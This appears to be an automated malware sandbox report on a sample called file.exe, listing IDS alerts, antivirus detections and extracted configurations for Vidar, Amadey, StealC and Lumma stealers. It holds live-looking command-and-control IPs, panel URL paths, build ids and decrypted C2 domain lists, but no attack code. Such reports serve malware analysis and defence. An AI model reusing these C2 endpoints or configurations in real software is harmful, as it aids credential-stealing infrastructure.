                              2024-12-21T22:17:58.042521+010020546531A Network Trojan was detected192.168.2.449915104.21.67.146443TCP
                              2024-12-21T22:18:00.662253+010020546531A Network Trojan was detected192.168.2.449922104.21.21.99443TCP
                              2024-12-21T22:18:01.451781+010020546531A Network Trojan was detected192.168.2.449927104.21.67.146443TCP
                              2024-12-21T22:18:02.789642+010020546531A Network Trojan was detected192.168.2.449928104.21.21.99443TCP
                              2024-12-21T22:18:11.679610+010020546531A Network Trojan was detected192.168.2.449953104.21.21.99443TCP
                              2024-12-21T22:18:17.150195+010020546531A Network Trojan was detected192.168.2.449962104.21.21.99443TCP
                              2024-12-21T22:18:30.194858+010020546531A Network Trojan was detected192.168.2.449990104.21.67.146443TCP
                              2024-12-21T22:18:33.182776+010020546531A Network Trojan was detected192.168.2.449999104.21.91.209443TCP
                              2024-12-21T22:18:35.520206+010020546531A Network Trojan was detected192.168.2.450006104.21.91.209443TCP
                              2024-12-21T22:18:40.008437+010020546531A Network Trojan was detected192.168.2.450020104.21.21.99443TCP
                              2024-12-21T22:19:06.583713+010020546531A Network Trojan was detected192.168.2.450068104.21.91.209443TCP
                              2024-12-21T22:19:10.727269+010020546531A Network Trojan was detected192.168.2.450079172.67.209.202443TCP
                              2024-12-21T22:19:13.629243+010020546531A Network Trojan was detected192.168.2.450082172.67.209.202443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:27.556841+010020498361A Network Trojan was detected192.168.2.449794172.67.209.202443TCP
                              2024-12-21T22:17:09.450089+010020498361A Network Trojan was detected192.168.2.449830104.21.21.99443TCP
                              2024-12-21T22:17:25.107335+010020498361A Network Trojan was detected192.168.2.449864104.21.21.99443TCP
                              2024-12-21T22:17:58.042521+010020498361A Network Trojan was detected192.168.2.449915104.21.67.146443TCP
                              2024-12-21T22:18:00.662253+010020498361A Network Trojan was detected192.168.2.449922104.21.21.99443TCP
                              2024-12-21T22:18:33.182776+010020498361A Network Trojan was detected192.168.2.449999104.21.91.209443TCP
                              2024-12-21T22:19:10.727269+010020498361A Network Trojan was detected192.168.2.450079172.67.209.202443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:29.653320+010020498121A Network Trojan was detected192.168.2.449795172.67.209.202443TCP
                              2024-12-21T22:17:11.891945+010020498121A Network Trojan was detected192.168.2.449836104.21.21.99443TCP
                              2024-12-21T22:17:31.312279+010020498121A Network Trojan was detected192.168.2.449868104.21.21.99443TCP
                              2024-12-21T22:18:01.451781+010020498121A Network Trojan was detected192.168.2.449927104.21.67.146443TCP
                              2024-12-21T22:18:02.789642+010020498121A Network Trojan was detected192.168.2.449928104.21.21.99443TCP
                              2024-12-21T22:18:35.520206+010020498121A Network Trojan was detected192.168.2.450006104.21.91.209443TCP
                              2024-12-21T22:19:13.629243+010020498121A Network Trojan was detected192.168.2.450082172.67.209.202443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:08.377859+010020583611Domain Observed Used for C2 Detected192.168.2.449830104.21.21.99443TCP
                              2024-12-21T22:17:11.127813+010020583611Domain Observed Used for C2 Detected192.168.2.449836104.21.21.99443TCP
                              2024-12-21T22:17:22.719552+010020583611Domain Observed Used for C2 Detected192.168.2.449861104.21.21.99443TCP
                              2024-12-21T22:17:24.221958+010020583611Domain Observed Used for C2 Detected192.168.2.449864104.21.21.99443TCP
                              2024-12-21T22:17:26.221008+010020583611Domain Observed Used for C2 Detected192.168.2.449867104.21.21.99443TCP
                              2024-12-21T22:17:26.381568+010020583611Domain Observed Used for C2 Detected192.168.2.449868104.21.21.99443TCP
                              2024-12-21T22:17:35.345292+010020583611Domain Observed Used for C2 Detected192.168.2.449880104.21.21.99443TCP
                              2024-12-21T22:17:38.312560+010020583611Domain Observed Used for C2 Detected192.168.2.449879104.21.21.99443TCP
                              2024-12-21T22:17:40.863780+010020583611Domain Observed Used for C2 Detected192.168.2.449894104.21.21.99443TCP
                              2024-12-21T22:17:48.628640+010020583611Domain Observed Used for C2 Detected192.168.2.449902104.21.21.99443TCP
                              2024-12-21T22:17:54.976425+010020583611Domain Observed Used for C2 Detected192.168.2.449911104.21.21.99443TCP
                              2024-12-21T22:17:59.914617+010020583611Domain Observed Used for C2 Detected192.168.2.449922104.21.21.99443TCP
                              2024-12-21T22:18:02.026185+010020583611Domain Observed Used for C2 Detected192.168.2.449928104.21.21.99443TCP
                              2024-12-21T22:18:05.654784+010020583611Domain Observed Used for C2 Detected192.168.2.449942104.21.21.99443TCP
                              2024-12-21T22:18:06.241033+010020583611Domain Observed Used for C2 Detected192.168.2.449944104.21.21.99443TCP
                              2024-12-21T22:18:10.903858+010020583611Domain Observed Used for C2 Detected192.168.2.449953104.21.21.99443TCP
                              2024-12-21T22:18:11.107174+010020583611Domain Observed Used for C2 Detected192.168.2.449954104.21.21.99443TCP
                              2024-12-21T22:18:12.741229+010020583611Domain Observed Used for C2 Detected192.168.2.449957104.21.21.99443TCP
                              2024-12-21T22:18:13.599031+010020583611Domain Observed Used for C2 Detected192.168.2.449959104.21.21.99443TCP
                              2024-12-21T22:18:16.371503+010020583611Domain Observed Used for C2 Detected192.168.2.449962104.21.21.99443TCP
                              2024-12-21T22:18:27.886023+010020583611Domain Observed Used for C2 Detected192.168.2.449987104.21.21.99443TCP
                              2024-12-21T22:18:30.983410+010020583611Domain Observed Used for C2 Detected192.168.2.449995104.21.21.99443TCP
                              2024-12-21T22:18:35.113633+010020583611Domain Observed Used for C2 Detected192.168.2.450007104.21.21.99443TCP
                              2024-12-21T22:18:39.217141+010020583611Domain Observed Used for C2 Detected192.168.2.450020104.21.21.99443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:26.797914+010020583981Domain Observed Used for C2 Detected192.168.2.449794172.67.209.202443TCP
                              2024-12-21T22:16:28.848986+010020583981Domain Observed Used for C2 Detected192.168.2.449795172.67.209.202443TCP
                              2024-12-21T22:16:31.771117+010020583981Domain Observed Used for C2 Detected192.168.2.449798172.67.209.202443TCP
                              2024-12-21T22:16:34.300779+010020583981Domain Observed Used for C2 Detected192.168.2.449799172.67.209.202443TCP
                              2024-12-21T22:16:46.381345+010020583981Domain Observed Used for C2 Detected192.168.2.449805172.67.209.202443TCP
                              2024-12-21T22:16:52.252326+010020583981Domain Observed Used for C2 Detected192.168.2.449811172.67.209.202443TCP
                              2024-12-21T22:17:03.292985+010020583981Domain Observed Used for C2 Detected192.168.2.449823172.67.209.202443TCP
                              2024-12-21T22:17:10.580936+010020583981Domain Observed Used for C2 Detected192.168.2.449834172.67.209.202443TCP
                              2024-12-21T22:19:09.966852+010020583981Domain Observed Used for C2 Detected192.168.2.450079172.67.209.202443TCP
                              2024-12-21T22:19:12.881418+010020583981Domain Observed Used for C2 Detected192.168.2.450082172.67.209.202443TCP
                              2024-12-21T22:19:19.434577+010020583981Domain Observed Used for C2 Detected192.168.2.450091172.67.209.202443TCP
                              2024-12-21T22:19:22.134489+010020583981Domain Observed Used for C2 Detected192.168.2.450094172.67.209.202443TCP
                              2024-12-21T22:19:24.699901+010020583981Domain Observed Used for C2 Detected192.168.2.450096172.67.209.202443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:18:13.137571+010020197142Potentially Bad Traffic192.168.2.449958185.215.113.1680TCP
                              2024-12-21T22:18:18.462501+010020197142Potentially Bad Traffic192.168.2.449965185.215.113.1680TCP
                              2024-12-21T22:18:41.850101+010020197142Potentially Bad Traffic192.168.2.450044185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:18.116305+010020446961A Network Trojan was detected192.168.2.449786185.215.113.4380TCP
                              2024-12-21T22:16:25.061905+010020446961A Network Trojan was detected192.168.2.449792185.215.113.4380TCP
                              2024-12-21T22:16:30.351540+010020446961A Network Trojan was detected192.168.2.449796185.215.113.4380TCP
                              2024-12-21T22:16:42.729419+010020446961A Network Trojan was detected192.168.2.449800185.215.113.4380TCP
                              2024-12-21T22:16:51.393048+010020446961A Network Trojan was detected192.168.2.449809185.215.113.4380TCP
                              2024-12-21T22:17:00.216514+010020446961A Network Trojan was detected192.168.2.449820185.215.113.4380TCP
                              2024-12-21T22:17:10.999882+010020446961A Network Trojan was detected192.168.2.449835185.215.113.4380TCP
                              2024-12-21T22:17:19.354390+010020446961A Network Trojan was detected192.168.2.449851185.215.113.4380TCP
                              2024-12-21T22:17:30.181424+010020446961A Network Trojan was detected192.168.2.449872185.215.113.4380TCP
                              2024-12-21T22:17:43.406299+010020446961A Network Trojan was detected192.168.2.449896185.215.113.4380TCP
                              2024-12-21T22:17:52.392375+010020446961A Network Trojan was detected192.168.2.449906185.215.113.4380TCP
                              2024-12-21T22:17:59.248914+010020446961A Network Trojan was detected192.168.2.449918185.215.113.4380TCP
                              2024-12-21T22:18:06.049863+010020446961A Network Trojan was detected192.168.2.449943185.215.113.4380TCP
                              2024-12-21T22:18:19.436842+010020446961A Network Trojan was detected192.168.2.449966185.215.113.4380TCP
                              2024-12-21T22:18:28.160583+010020446961A Network Trojan was detected192.168.2.449988185.215.113.4380TCP
                              2024-12-21T22:18:40.480180+010020446961A Network Trojan was detected192.168.2.450033185.215.113.4380TCP
                              2024-12-21T22:18:46.144838+010020446961A Network Trojan was detected192.168.2.450056185.215.113.4380TCP
                              2024-12-21T22:18:52.044070+010020446961A Network Trojan was detected192.168.2.450060185.215.113.4380TCP
                              2024-12-21T22:18:58.521230+010020446961A Network Trojan was detected192.168.2.450064185.215.113.4380TCP
                              2024-12-21T22:19:07.712276+010020446961A Network Trojan was detected192.168.2.450070185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:46.292957+010020543501A Network Trojan was detected192.168.2.449899185.121.15.19280TCP
                              2024-12-21T22:17:49.751331+010020543501A Network Trojan was detected192.168.2.449903185.121.15.19280TCP
                              2024-12-21T22:18:40.409840+010020543501A Network Trojan was detected192.168.2.450031185.121.15.19280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:06.792920+010020583601Domain Observed Used for C2 Detected192.168.2.4552981.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:06.302972+010020583641Domain Observed Used for C2 Detected192.168.2.4564761.1.1.153UDP
                              2024-12-21T22:17:22.683856+010020583641Domain Observed Used for C2 Detected192.168.2.4593731.1.1.153UDP
                              2024-12-21T22:17:58.199550+010020583641Domain Observed Used for C2 Detected192.168.2.4602671.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:25.216297+010020583971Domain Observed Used for C2 Detected192.168.2.4512711.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:05.883028+010020583781Domain Observed Used for C2 Detected192.168.2.4508521.1.1.153UDP
                              2024-12-21T22:17:22.517396+010020583781Domain Observed Used for C2 Detected192.168.2.4650761.1.1.153UDP
                              2024-12-21T22:17:58.035506+010020583781Domain Observed Used for C2 Detected192.168.2.4640301.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:24.868426+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.449863TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:24.720819+010020442441Malware Command and Control Activity Detected192.168.2.449863185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:25.196492+010020442461Malware Command and Control Activity Detected192.168.2.449863185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:27.085923+010020442481Malware Command and Control Activity Detected192.168.2.449863185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:06.306150+010020442471Malware Command and Control Activity Detected94.130.188.57443192.168.2.449827TCP
                              2024-12-21T22:17:25.325798+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.449863TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:09.905486+010020518311Malware Command and Control Activity Detected94.130.188.57443192.168.2.449831TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:02.641066+010020490871A Network Trojan was detected192.168.2.44982194.130.188.57443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:44.752503+010020480941Malware Command and Control Activity Detected192.168.2.449799172.67.209.202443TCP
                              2024-12-21T22:17:23.701722+010020480941Malware Command and Control Activity Detected192.168.2.449861104.21.21.99443TCP
                              2024-12-21T22:17:55.764367+010020480941Malware Command and Control Activity Detected192.168.2.449911104.21.21.99443TCP
                              2024-12-21T22:18:09.316077+010020480941Malware Command and Control Activity Detected192.168.2.449949104.21.67.146443TCP
                              2024-12-21T22:18:25.942383+010020480941Malware Command and Control Activity Detected192.168.2.449959104.21.21.99443TCP
                              2024-12-21T22:18:48.802657+010020480941Malware Command and Control Activity Detected192.168.2.450059104.21.91.209443TCP
                              2024-12-21T22:19:23.077294+010020480941Malware Command and Control Activity Detected192.168.2.450094172.67.209.202443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:24.227416+010020442431Malware Command and Control Activity Detected192.168.2.449863185.215.113.20680TCP
                              2024-12-21T22:18:20.497392+010020442431Malware Command and Control Activity Detected192.168.2.449967185.215.113.20680TCP
                              2024-12-21T22:18:30.160080+010020442431Malware Command and Control Activity Detected192.168.2.449989185.215.113.20680TCP
                              2024-12-21T22:18:33.030792+010020442431Malware Command and Control Activity Detected192.168.2.449998185.215.113.20680TCP
                              2024-12-21T22:18:36.873881+010020442431Malware Command and Control Activity Detected192.168.2.450008185.215.113.20680TCP
                              2024-12-21T22:18:58.404289+010020442431Malware Command and Control Activity Detected192.168.2.450062185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:05.306446+010028561471A Network Trojan was detected192.168.2.449758185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:18:05.271328+010028561481A Network Trojan was detected192.168.2.449923212.193.31.880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:16.778945+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449764TCP
                              2024-12-21T22:18:39.117003+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450005TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:09.986625+010028033053Unknown Traffic192.168.2.44977031.41.244.1180TCP
                              2024-12-21T22:16:19.568200+010028033053Unknown Traffic192.168.2.44979131.41.244.1180TCP
                              2024-12-21T22:16:26.516539+010028033053Unknown Traffic192.168.2.44979331.41.244.1180TCP
                              2024-12-21T22:16:31.803353+010028033053Unknown Traffic192.168.2.44979731.41.244.1180TCP
                              2024-12-21T22:16:44.182010+010028033053Unknown Traffic192.168.2.44980431.41.244.1180TCP
                              2024-12-21T22:16:52.985500+010028033053Unknown Traffic192.168.2.449813185.215.113.1680TCP
                              2024-12-21T22:17:01.804739+010028033053Unknown Traffic192.168.2.449822185.215.113.1680TCP
                              2024-12-21T22:17:12.542317+010028033053Unknown Traffic192.168.2.449839185.215.113.1680TCP
                              2024-12-21T22:17:20.904835+010028033053Unknown Traffic192.168.2.449857185.215.113.1680TCP
                              2024-12-21T22:17:31.755975+010028033053Unknown Traffic192.168.2.44987431.41.244.1180TCP
                              2024-12-21T22:17:45.140592+010028033053Unknown Traffic192.168.2.44989831.41.244.1180TCP
                              2024-12-21T22:17:53.896569+010028033053Unknown Traffic192.168.2.44990731.41.244.1180TCP
                              2024-12-21T22:18:00.718394+010028033053Unknown Traffic192.168.2.44992631.41.244.1180TCP
                              2024-12-21T22:18:07.524363+010028033053Unknown Traffic192.168.2.44994831.41.244.1180TCP
                              2024-12-21T22:18:21.017248+010028033053Unknown Traffic192.168.2.44997031.41.244.1180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:27.896588+010028033043Unknown Traffic192.168.2.449863185.215.113.20680TCP
                              2024-12-21T22:17:47.565868+010028033043Unknown Traffic192.168.2.449893185.215.113.20680TCP
                              2024-12-21T22:17:49.585282+010028033043Unknown Traffic192.168.2.449893185.215.113.20680TCP
                              2024-12-21T22:17:51.416340+010028033043Unknown Traffic192.168.2.449893185.215.113.20680TCP
                              2024-12-21T22:17:53.102897+010028033043Unknown Traffic192.168.2.449893185.215.113.20680TCP
                              2024-12-21T22:17:56.888364+010028033043Unknown Traffic192.168.2.449893185.215.113.20680TCP
                              2024-12-21T22:17:58.217073+010028033043Unknown Traffic192.168.2.449893185.215.113.20680TCP
                              2024-12-21T22:18:06.763276+010028033043Unknown Traffic192.168.2.449946185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:18:05.668911+010028438641A Network Trojan was detected192.168.2.449942104.21.21.99443TCP
                              2024-12-21T22:18:35.123295+010028438641A Network Trojan was detected192.168.2.450007104.21.21.99443TCP
                              2024-12-21T22:19:03.903392+010028438641A Network Trojan was detected192.168.2.450066104.21.91.209443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:17:00.161237+010028593781Malware Command and Control Activity Detected192.168.2.44981894.130.188.57443TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: file.exeAvira: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
                              Source: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                              Source: 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                              Source: 11.2.85746525a0.exe.400000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "grannyejh.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "energyaffai.lat", "pancakedipyps.click", "aspecteirs.lat", "discokeyus.lat"], "Build id": "FATE99--test"}
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 21%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 56%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[4].exeReversingLabs: Detection: 63%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[5].exeReversingLabs: Detection: 27%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 68%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeReversingLabs: Detection: 86%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]ReversingLabs: Detection: 75%
                              Source: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exeReversingLabs: Detection: 21%
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeReversingLabs: Detection: 68%
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeReversingLabs: Detection: 56%
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeReversingLabs: Detection: 86%
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Temp\1019677001\fbaaecbd82.exeReversingLabs: Detection: 63%
                              Source: C:\Users\user\AppData\Local\Temp\1019679001\cd81608004.exeReversingLabs: Detection: 27%
                              Source: C:\Users\user\AppData\Local\Temp\1019680001\92aba5cf15.exeReversingLabs: Detection: 56%
                              Source: C:\Users\user\AppData\Local\Temp\1019682001\62a707bc2a.exeReversingLabs: Detection: 21%
                              Source: C:\Users\user\AppData\Local\Temp\1019683001\796ecf2647.exeReversingLabs: Detection: 68%
                              Source: C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Y-Cleaner.exeReversingLabs: Detection: 75%
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                              Source: file.exeVirustotal: Detection: 56%Perma Link
                              Source: file.exeReversingLabs: Detection: 52%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: file.exeJoe Sandbox ML: detected
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: rapeflowwj.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: crosshuaht.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: sustainskelet.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: aspecteirs.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: energyaffai.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: necklacebudi.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: discokeyus.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: grannyejh.lat
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: pancakedipyps.click
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: lid=%s&j=%s&ver=4.0
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: TeslaBrowser/5.5
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: - Screen Resoluton:
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: - Physical Installed Memory:
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: Workgroup: -
                              Source: 11.2.85746525a0.exe.400000.1.unpackString decryptor: FATE99--test
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b63f1026-0
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49798 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49799 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49807 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49810 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49811 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49814 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49830 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49834 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49864 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49868 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49880 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49894 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49902 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49915 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49922 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49927 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49942 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49944 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49949 version: TLS 1.2
